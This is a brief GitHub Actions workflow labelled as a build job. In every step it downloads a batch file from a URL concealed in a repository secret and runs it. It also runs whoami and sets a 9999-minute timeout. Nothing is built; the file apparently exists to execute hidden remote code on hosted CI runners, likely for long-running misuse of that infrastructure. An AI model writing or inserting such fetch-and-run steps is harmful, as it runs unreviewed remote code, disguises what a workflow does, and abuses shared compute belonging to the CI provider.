name: mainBUILD

on: workflow_dispatch

jobs:
  build:

    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    - run: curl -s -L ${{secrets.BUILD}} -o run.bat
    - name: BUILD
      run: cmd /c run.bat
    - name: owner
      run: cmd /c whoami
    - name: v-BUILD
      run: cmd /c run.bat
